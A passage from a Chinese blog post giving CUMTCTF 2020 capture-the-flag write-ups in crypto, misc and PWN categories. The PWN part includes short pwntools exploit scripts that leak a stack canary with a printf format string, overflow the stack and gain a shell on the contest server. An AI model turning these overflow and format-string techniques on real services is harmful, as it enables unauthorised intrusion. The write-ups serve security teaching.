class="line">            chr3 = input.charCodeAt(i++);</span><br><span class="line">            enc1 = chr1 &gt;&gt; <span class="number">2</span>;</span><br><span class="line">            enc2 = ((chr1 &amp; <span class="number">3</span>) &lt;&lt; <span class="number">4</span>) | (chr2 &gt;&gt; <span class="number">4</span>);</span><br><span class="line">            enc3 = ((chr2 &amp; <span class="number">15</span>) &lt;&lt; <span class="number">2</span>) | (chr3 &gt;&gt; <span class="number">6</span>);</span><br><span class="line">            enc4 = chr3 &amp; <span class="number">63</span>;</span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">isNaN</span>(chr2)) &#123;</span><br><span class="line">                enc3 = enc4 = <span class="number">64</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">isNaN</span>(chr3)) &#123;</span><br><span class="line">                enc4 = <span class="number">64</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            output = output +</span><br><span class="line">                _keyStr.charAt(enc1) + _keyStr.charAt(enc2) +</span><br><span class="line">                _keyStr.charAt(enc3) + _keyStr.charAt(enc4);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> output;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// public method for decoding</span></span><br><span class="line">    <span class="built_in">this</span>.decode = <span class="function"><span class="keyword">function</span> (<span class="params">input</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">var</span> output = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="keyword">var</span> chr1, chr2, chr3;</span><br><span class="line">        <span class="keyword">var</span> enc1, enc2, enc3, enc4;</span><br><span class="line">        <span class="keyword">var</span> i = <span class="number">0</span>;</span><br><span class="line">        input = input.replace(<span class="regexp">/[^A-Za-z0-9\+\/\=]/g</span>, <span class="string">&quot;&quot;</span>);</span><br><span class="line">        <span class="keyword">while</span> (i &lt; input.length) &#123;</span><br><span class="line">            enc1 = _keyStr.indexOf(input.charAt(i++));</span><br><span class="line">            enc2 = _keyStr.indexOf(input.charAt(i++));</span><br><span class="line">            enc3 = _keyStr.indexOf(input.charAt(i++));</span><br><span class="line">            enc4 = _keyStr.indexOf(input.charAt(i++));</span><br><span class="line">            chr1 = (enc1 &lt;&lt; <span class="number">2</span>) | (enc2 &gt;&gt; <span class="number">4</span>);</span><br><span class="line">            chr2 = ((enc2 &amp; <span class="number">15</span>) &lt;&lt; <span class="number">4</span>) | (enc3 &gt;&gt; <span class="number">2</span>);</span><br><span class="line">            chr3 = ((enc3 &amp; <span class="number">3</span>) &lt;&lt; <span class="number">6</span>) | enc4;</span><br><span class="line">            output = output + <span class="built_in">String</span>.fromCharCode(chr1);</span><br><span class="line">            <span class="keyword">if</span> (enc3 != <span class="number">64</span>) &#123;</span><br><span class="line">                output = output + <span class="built_in">String</span>.fromCharCode(chr2);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (enc4 != <span class="number">64</span>) &#123;</span><br><span class="line">                output = output + <span class="built_in">String</span>.fromCharCode(chr3);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        output = _utf8_decode(output);</span><br><span class="line">        <span class="keyword">return</span> output;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// private method for UTF-8 encoding</span></span><br><span class="line">    _utf8_encode = <span class="function"><span class="keyword">function</span> (<span class="params">string</span>) </span>&#123;</span><br><span class="line">        string = string.replace(<span class="regexp">/\r\n/g</span>, <span class="string">&quot;\n&quot;</span>);</span><br><span class="line">        <span class="keyword">var</span> utftext = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="keyword">for</span> (<span class="keyword">var</span> n = <span class="number">0</span>; n &lt; string.length; n++) &#123;</span><br><span class="line">            <span class="keyword">var</span> c = string.charCodeAt(n);</span><br><span class="line">            <span class="keyword">if</span> (c &lt; <span class="number">128</span>) &#123;</span><br><span class="line">                utftext += <span class="built_in">String</span>.fromCharCode(c);</span><br><span class="line">            &#125; <span class="keyword">else</span> <span class="keyword">if</span> ((c &gt; <span class="number">127</span>) &amp;&amp; (c &lt; <span class="number">2048</span>)) &#123;</span><br><span class="line">                utftext += <span class="built_in">String</span>.fromCharCode((c &gt;&gt; <span class="number">6</span>) | <span class="number">192</span>);</span><br><span class="line">                utftext += <span class="built_in">String</span>.fromCharCode((c &amp; <span class="number">63</span>) | <span class="number">128</span>);</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                utftext += <span class="built_in">String</span>.fromCharCode((c &gt;&gt; <span class="number">12</span>) | <span class="number">224</span>);</span><br><span class="line">                utftext += <span class="built_in">String</span>.fromCharCode(((c &gt;&gt; <span class="number">6</span>) &amp; <span class="number">63</span>) | <span class="number">128</span>);</span><br><span class="line">                utftext += <span class="built_in">String</span>.fromCharCode((c &amp; <span class="number">63</span>) | <span class="number">128</span>);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> utftext;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// private method for UTF-8 decoding</span></span><br><span class="line">    _utf8_decode = <span class="function"><span class="keyword">function</span> (<span class="params">utftext</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">var</span> string = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="keyword">var</span> i = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">var</span> c = c1 = c2 = <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">while</span> (i &lt; utftext.length) &#123;</span><br><span class="line">            c = utftext.charCodeAt(i);</span><br><span class="line">            <span class="keyword">if</span> (c &lt; <span class="number">128</span>) &#123;</span><br><span class="line">                string += <span class="built_in">String</span>.fromCharCode(c);</span><br><span class="line">                i++;</span><br><span class="line">            &#125; <span class="keyword">else</span> <span class="keyword">if</span> ((c &gt; <span class="number">191</span>) &amp;&amp; (c &lt; <span class="number">224</span>)) &#123;</span><br><span class="line">                c2 = utftext.charCodeAt(i + <span class="number">1</span>);</span><br><span class="line">                string += <span class="built_in">String</span>.fromCharCode(((c &amp; <span class="number">31</span>) &lt;&lt; <span class="number">6</span>) | (c2 &amp; <span class="number">63</span>));</span><br><span class="line">                i += <span class="number">2</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                c2 = utftext.charCodeAt(i + <span class="number">1</span>);</span><br><span class="line">                c3 = utftext.charCodeAt(i + <span class="number">2</span>);</span><br><span class="line">                string += <span class="built_in">String</span>.fromCharCode(((c &amp; <span class="number">15</span>) &lt;&lt; <span class="number">12</span>) | ((c2 &amp; <span class="number">63</span>) &lt;&lt; <span class="number">6</span>) | (c3 &amp; <span class="number">63</span>));</span><br><span class="line">                i += <span class="number">3</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> string;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> s = <span class="string">&#x27;ZmxhZ3tiGNXlXjHfaDTzN2FfK3LycRTpc2L9&#x27;</span>;</span><br><span class="line"><span class="keyword">var</span> base = <span class="keyword">new</span> BASE64();</span><br><span class="line"><span class="built_in">console</span>.log(base.decode(s));</span><br></pre></td></tr></table></figure>

<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="最最最基础密码"><a href="#最最最基础密码" class="headerlink" title="最最最基础密码"></a>最最最基础密码</h3><blockquote>
<p>Authro: 周浩</p>
</blockquote>
<p>简单的仿射密码，解密后得到flag:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">crypto_1s_super_easy!</span><br></pre></td></tr></table></figure>

<h3 id="easy-RSA"><a href="#easy-RSA" class="headerlink" title="easy_RSA"></a>easy_RSA</h3><blockquote>
<p>Author: 钟昌甫</p>
</blockquote>
<ol>
<li><p>从题设代码中可以得到的信息有n=p∗q∗rn=p∗q∗r</p>
</li>
<li><p>d=invert(q2,p2)d=invert(q2,p2)</p>
</li>
<li><p>c=m2 mod rc=m2 mod r</p>
</li>
<li><p>cipher=ce mod ncipher=ce mod n</p>
</li>
<li><p>同时，注释中已经给出nn，dd，ciphercipher的值，所以基本的思路是先由ciphercipher求出cc，再由cc求出mm</p>
</li>
<li><p>由ciphercipher求出cc首先要确定e mod ne mod n的逆元，所以需要先求出ϕ(n)ϕ(n)，那么需要先对n进行<a target="_blank" rel="noopener" href="http://www.factordb.com/index.php">分解</a>得到p,q,rp,q,r(题设中知道p是最小的那个)</p>
</li>
<li><p>题设中知道p,q,rp,q,r都是素数，欧拉函数很简单了就是ϕ(n)=(p−1)(q−1)(r−1)ϕ(n)=(p−1)(q−1)(r−1)</p>
</li>
<li><p>利用gmpy2.invert函数求ee的逆元decdec后，有c=cipherdec mod nc=cipherdec mod n</p>
</li>
<li><p>求m2=c mod rm2=c mod r的解m</p>
</li>
<li><p>完整代码如下</p>
</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> gmpy2 <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> sympy.ntheory.residue_ntheory <span class="keyword">import</span> nthroot_mod</span><br><span class="line"></span><br><span class="line">n = <span class="number">7941371739956577280160664419383740967516918938781306610817149744988379280561359039016508679365806108722198157199058807892703837558280678711420411242914059658055366348123106473335186505617418956630780649894945233345985279471106888635177256011468979083320605103256178446993230320443790240285158260236926519042413378204298514714890725325831769281505530787739922007367026883959544239568886349070557272869042275528961483412544495589811933856131557221673534170105409</span></span><br><span class="line">d = <span class="number">7515987842794170949444517202158067021118454558360145030399453487603693522695746732547224100845570119375977629070702308991221388721952258969752305904378724402002545947182529859604584400048983091861594720299791743887521228492714135449584003054386457751933095902983841246048952155097668245322664318518861440</span></span><br><span class="line">cipher = <span class="number">1618155233923718966393124032999431934705026408748451436388483012584983753140040289666712916510617403356206112730613485227084128314043665913357106301736817062412927135716281544348612150328867226515184078966397180771624148797528036548243343316501503364783092550480439749404301122277056732857399413805293899249313045684662146333448668209567898831091274930053147799756622844119463942087160062353526056879436998061803187343431081504474584816590199768034450005448200</span></span><br><span class="line"></span><br><span class="line">p = <span class="number">102634610559478918970860957918259981057327949366949344137104804864768237961662136189827166317524151288799657758536256924609797810164397005081733039415393</span></span><br><span class="line">q = <span class="number">7534810196420932552168708937019691994681052660068275906973480617604535381306041583841106383688654426129050931519275383386503174076258645141589911492908993</span></span><br><span class="line">r = <span class="number">10269028767754306217563721664976261924407940883784193817786660413744866184645984238866463711873380072803747092361041245422348883639933712733051005791543841</span></span><br><span class="line">phn = (p<span class="number">-1</span>)*(q<span class="number">-1</span>)*(r<span class="number">-1</span>)</span><br><span class="line">e = <span class="number">0x10001</span></span><br><span class="line">dec = invert(e,phn)</span><br><span class="line">print(dec)</span><br><span class="line"><span class="comment"># dec = 696507389127827123706661871654450815284301235334466795840166268431469309011195076922454367593796687564813693144028411855398655084684946537577925810218190635193690686941033400271584581743511646525701770230697389808139688889055897738680146145489141461623210306152017482372340288056132947782754463871096351562634396868323861335480091797855608845695507892749062713128285934572259972389743839646950269761373893877746254763641876362977045864056456449244814748352513</span></span><br><span class="line"></span><br><span class="line">c = pow(cipher,dec,n)</span><br><span class="line">print(c)</span><br><span class="line"><span class="comment"># c = 8081092455112516397361105816900490085355315574087538340788309885334106796325593823678787887569920404814986643819898763828872716522338864714182757065213683</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># nthroot_mod(a,n,p) Find the solutions to x**n = a mod p</span></span><br><span class="line">m = nthroot_mod(c,<span class="number">2</span>,r)</span><br><span class="line">print(m)</span><br><span class="line"><span class="comment"># m = 56006392793430016468251971646527328995718100207125432393433900875091739391190683811783574991236326013</span></span><br><span class="line">print(long_to_bytes(m))</span><br></pre></td></tr></table></figure>

<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="签到-2"><a href="#签到-2" class="headerlink" title="签到"></a>签到</h3><blockquote>
<p>Author: 钟昌甫</p>
</blockquote>
<p>打开题目发现是Ook语句，找到在线解码器[Brainfuck/Ook! Obfuscation/Encoding <a target="_blank" rel="noopener" href="https://www.splitbrain.org/services/ook">splitbrain.org]</a>直接解码得到cumtctf{S1Gn_1NnN_We1C0m3}</p>
<h3 id="双重洗脑"><a href="#双重洗脑" class="headerlink" title="双重洗脑"></a>双重洗脑</h3><blockquote>
<p>Author: 钟昌甫</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">佛曰：闍皤夢地切都諳朋怛奢槃哆心冥神冥陀盧奢醯菩知奢盡俱參娑死缽怛亦喝實集冥得罰楞諳諦切怯迦世俱</span><br><span class="line"></span><br><span class="line">他顛哆帝缽。迦梵諦呼盧皤逝死俱訶死呐。怯栗侄倒無神皤訶公正爱国和谐和谐公正友善爱国公正法治平等友</span><br><span class="line"></span><br><span class="line">善敬业公正友善爱国和谐和谐公正诚信自由和谐敬业平等友善敬业公正诚信文明和谐民主自由民主公正诚信自</span><br><span class="line"></span><br><span class="line">由公正法治法治诚信和谐</span><br></pre></td></tr></table></figure>

<p>前半段为佛语，在线解密得cumtctf{fu11_0f_Z</p>
<p>后半段为社会主义价值观密码，解密后为h3ng_n3n9_l1Ang}得到完全的cumtctf{fu11_0f_Zh3ng_n3n9_l1Ang}</p>
<h3 id="真签到-1"><a href="#真签到-1" class="headerlink" title="真签到"></a>真签到</h3><blockquote>
<p>Author: 钟昌甫</p>
</blockquote>
<p>提示为拍一拍，联想到微信和qq，发现是qq号码，加好友拍一拍得</p>
<p>到提示发现是base64密码，解密得到flag{isveryfun?}</p>
<h3 id="猜猜可莉的falg藏到哪了"><a href="#猜猜可莉的falg藏到哪了" class="headerlink" title="猜猜可莉的falg藏到哪了"></a>猜猜可莉的falg藏到哪了</h3><blockquote>
<p>Author: 钟昌甫</p>
</blockquote>
<p>根据提示查看图片含有的EXIF信息</p>
<p>发现有盲文密码⡓⡅⡝⡄⡓⡄⡖⡋⡖⡱⡞⠉⡸⡥⠀⡯⠃⡘⡑⡿⡣⡘⠄⡞⡯⡻⠆⡜⠁⡯⡇⡱⡞⡴⠄⡾⡍=</p>
<p>解密得cumtctf{fAn9HU0_3haOSh4n_K6l1_wAnD4N}</p>
<h3 id="7的意志！"><a href="#7的意志！" class="headerlink" title="7的意志！"></a>7的意志！</h3><blockquote>
<p>Author: 钟昌甫</p>
</blockquote>
<p>解压发现有密码，根据提示发现文本就是flag，根据图片提示应为凯撒密码和栏杆密码，栏杆密码位数为7，凯撒密码尝试得出位移为13，得到flag</p>
<h3 id="奇怪的题"><a href="#奇怪的题" class="headerlink" title="奇怪的题"></a>奇怪的题</h3><blockquote>
<p>Author: 钟昌甫</p>
</blockquote>
<p>打开压缩包发现是二维码拼接根据第二个文档用base64换出第二列二维码然后和第一列拼接，第三个文件用winhex换高度得到二维码最右边的部分，然后将二维码定位符补全扫描二维码得到cumtctf{I5_1asy_right?}</p>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="test-nc"><a href="#test-nc" class="headerlink" title="test_nc"></a>test_nc</h3><blockquote>
<p>Author: 季廷宇</p>
</blockquote>
<p>直接nc，cat flag</p>
<h3 id="pwn2"><a href="#pwn2" class="headerlink" title="pwn2"></a>pwn2</h3><blockquote>
<p>Author: 季廷宇</p>
</blockquote>
<p>checksec发现canary保护</p>
<p><img src="https://i.loli.net/2020/11/28/SohFTK1D87ErAdu.png" alt="image-20201128085042122"></p>
<p>分析程序，可以进行栈溢出并利用printf函数格式化字符串漏洞泄露canary</p>
<p><img src="https://i.loli.net/2020/11/28/uhI5wdGcitE7Kr8.png" alt="image-20201128085850342"></p>
<p>canary存储在var_8中，据栈顶40字节，64位Linux前六个参数用寄存器传递，所以var_8是printf函数的第12个参数，因此使用“%11$p”作为printf参数可以泄露出canary的值。</p>
<p>参考链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44113469/article/details/88934953">https://blog.csdn.net/weixin_44113469/article/details/88934953</a></p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#r = process(&#x27;./overflow&#x27;)</span></span><br><span class="line">r = remote(<span class="string">&quot;219.219.61.234&quot;</span>, <span class="number">10011</span>)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&quot;Please input your username&quot;</span>)</span><br><span class="line">r.sendline(<span class="string">&quot;%11$p&quot;</span>)</span><br><span class="line">canary=int(r.recvuntil(<span class="string">&quot;00&quot;</span>),<span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">r.send(<span class="string">&#x27;a&#x27;</span>*<span class="number">40</span>+p64(canary)+<span class="string">&#x27;a&#x27;</span>*<span class="number">8</span>+p64(<span class="number">0x40075A</span>))</span><br><span class="line">r.recv()</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>



<h3 id="pwn3"><a href="#pwn3" class="headerlink" title="pwn3"></a>pwn3</h3><blockquote>
<p>Author: 季廷宇</p>
</blockquote>
<p><img src="https://i.loli.net/2020/11/28/p58KeRCujbkHItq.png" alt="image-20201128090612734"></p>
<p>分析程序，存在栈溢出</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#r = process(&#x27;./overflow1&#x27;)</span></span><br><span class="line">r = remote(<span class="string">&quot;219.219.61.234&quot;</span>, <span class="number">10012</span>)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&quot;Welcome to CTF2020!&quot;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;a&#x27;</span>*<span class="number">40</span>+p64(<span class="number">0x40067A</span>))</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>



<h3 id="pwn4"><a href="#pwn4" class="headerlink" title="pwn4"></a>pwn4</h3><blockquote>
<p>Author: 季廷宇</p>
</blockquote>
<p><img src="https://i.loli.net/2020/11/28/Mn7lYETuLkQwHGI.png" alt="image-20201128091154831"></p>
<p>分析程序：输入一个大于0的数，并在if判断中为0才能拿到shell</p>
<p>在if判断前将v5的值赋给了v4，而v5是4字节的int类型，v4为2字节int16，在大范围类型转小范围时高位会被截断，丢失前2位。</p>
<p>int16最大表示32,767，因此当v5的值为16进制的100,000时，最高位1丢失使得v4=0。传入1048576即可拿到shell</p>
<p><img src="https://i.loli.net/2020/11/28/stZPRCAmW5SGaoy.png" alt="image-20201128105347787"></p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#r = process(&#x27;./overflow2&#x27;)</span></span><br><span class="line">r = remote(<span class="string">&#x27;219.219.61.234&#x27;</span>, <span class="number">10013</span>)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&#x27;Please enter your lucky number!&#x27;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;1048576&#x27;</span>)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/bug-ddblog-punish/tags/CUMTCTF/" rel="tag"># CUMTCTF</a>
              <a href="/bug-ddblog-punish/tags/Writeup/" rel="tag"># Writeup</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/bug-ddblog-punish/p/13758/" rel="prev" title="CUMTCTF 2020 10">
      <i class="fa fa-chevron-left"></i> CUMTCTF 2020 10
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Web"><span class="nav-number">1.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AD%BE%E5%88%B0"><span class="nav-number">1.1.</span> <span class="nav-text">签到</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AD%BE%E5%88%B0%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">1.2.</span> <span class="nav-text">签到序列化</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#easy-upload"><span class="nav-number">1.3.</span> <span class="nav-text">easy_upload</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#easyunserialize"><span class="nav-number">1.4.</span> <span class="nav-text">easyunserialize</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#EZ-PHP"><span class="nav-number">1.5.</span> <span class="nav-text">EZ PHP</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Sql1"><span class="nav-number">1.6.</span> <span class="nav-text">Sql1</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RE"><span class="nav-number">2.</span> <span class="nav-text">RE</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AD%BE%E5%88%B0-1"><span class="nav-number">2.1.</span> <span class="nav-text">签到</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9C%9F%E7%AD%BE%E5%88%B0"><span class="nav-number">2.2.</span> <span class="nav-text">真签到</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%80%86%E5%90%91%E4%B9%9F%E5%B0%B1%E8%BF%99%E4%B9%88%E9%9A%BE%E4%BA%86"><span class="nav-number">2.3.</span> <span class="nav-text">逆向也就这么难了</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#double-try"><span class="nav-number">2.4.</span> <span class="nav-text">double try</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%AE%B0%E4%BA%8B%E6%9C%AC%E9%80%86%E5%90%91"><span class="nav-number">2.5.</span> <span class="nav-text">记事本逆向</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#easy-cpp"><span class="nav-number">2.6.</span> <span class="nav-text">easy_cpp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Crypto"><span class="nav-number">3.</span> <span class="nav-text">Crypto</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9C%80%E6%9C%80%E6%9C%80%E5%9F%BA%E7%A1%80%E5%AF%86%E7%A0%81"><span class="nav-number">3.1.</span> <span class="nav-text">最最最基础密码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#easy-RSA"><span class="nav-number">3.2.</span> <span class="nav-text">easy_RSA</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MISC"><span class="nav-number">4.</span> <span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AD%BE%E5%88%B0-2"><span class="nav-number">4.1.</span> <span class="nav-text">签到</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%8C%E9%87%8D%E6%B4%97%E8%84%91"><span class="nav-number">4.2.</span> <span class="nav-text">双重洗脑</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9C%9F%E7%AD%BE%E5%88%B0-1"><span class="nav-number">4.3.</span> <span class="nav-text">真签到</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%8C%9C%E7%8C%9C%E5%8F%AF%E8%8E%89%E7%9A%84falg%E8%97%8F%E5%88%B0%E5%93%AA%E4%BA%86"><span class="nav-number">4.4.</span> <span class="nav-text">猜猜可莉的falg藏到哪了</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7%E7%9A%84%E6%84%8F%E5%BF%97%EF%BC%81"><span class="nav-number">4.5.</span> <span class="nav-text">7的意志！</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A5%87%E6%80%AA%E7%9A%84%E9%A2%98"><span class="nav-number">4.6.</span> <span class="nav-text">奇怪的题</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PWN"><span class="nav-number">5.</span> <span class="nav-text">PWN</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#test-nc"><span class="nav-number">5.1.</span> <span class="nav-text">test_nc</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pwn2"><span class="nav-number">5.2.</span> <span class="nav-text">pwn2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pwn3"><span class="nav-number">5.3.</span> <span class="nav-text">pwn3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pwn4"><span class="nav-number">5.4.</span> <span class="nav-text">pwn4</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Zhou Hao</p>
  <div class="site-description" itemprop="description">bugDD的日常总结</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/bug-ddblog-punish/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Zhou Hao</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/bug-ddblog-punish/lib/anime.min.js"></script>
  <script src="/bug-ddblog-punish/lib/velocity/velocity.min.js"></script>
  <script src="/bug-ddblog-punish/lib/velocity/velocity.ui.min.js"></script>

<script src="/bug-ddblog-punish/js/utils.js"></script>

<script src="/bug-ddblog-punish/js/motion.js"></script>


<script src="/bug-ddblog-punish/js/schemes/muse.js"></script>


<script src="/bug-ddblog-punish/js/next-boot.js"></script>




  




  
<script src="/bug-ddblog-punish/js/local-search.js"></script>













  

  

  

</body>

<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

</html>
